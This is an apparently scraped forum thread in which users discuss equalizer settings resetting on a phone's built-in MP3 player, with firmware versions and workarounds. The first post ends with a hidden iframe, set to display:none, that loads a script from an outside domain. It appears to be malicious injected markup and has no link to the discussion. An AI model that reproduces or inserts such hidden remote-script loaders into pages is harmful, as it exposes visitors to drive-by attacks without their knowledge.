+ Reply to Thread

Built-in MP3 player and treble bug?

I have my bass and treble turned all the way up. But when I play a song, or when the player advances to the next song, the treble sounds lower until I move the slider down then up again. The slider doesn't move by itself, it just sounds lower.

Any one see this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I haven't seen that one, but sometimes the bass setting messes up on mine (Alltel SZ 1.0.13, MZ 1.0.27--old firmware) If I set the bass on max, it will work fine. If I stop and re-start the MP3 app, there will be little or no bass in the audio. The slider will still show max. If I move the slider to the middle and then back up again, the audio will once again have maximum bass. I guess this app is buggy. Hopefully, that new MP3 app will soon be available.

Ah, i notice that too. I also have the same firmware as you.
    I guess the bass problem is not as bad because it keeps the setting as long as it's still playing something. My treble problem is worse because it changes itself between songs...

Edit:
    I did another test, and it's not as bad as I thought. Treble doesn't reset itself it I let it advance from song to song automatically. It does reset if i use the "next" and "previous" buttons. I can live with that.

Mine resets the eq settings, too, but only when the phone's been turned off. One thing with the settings, I have found that you get better bass sound if you put the eq slider a little lower than the max setting. Mine sounds overpowered and muddy when I put the bass all the way up, so I set it just to the left of the max and it seems to come through a lot better. The treble resetting between each song doesn't happen though, as far as I can tell.

Maybe you should volunteer for Palm Nut's mp3 beta.
    ---------------
    The same thing we do every night, Pinky...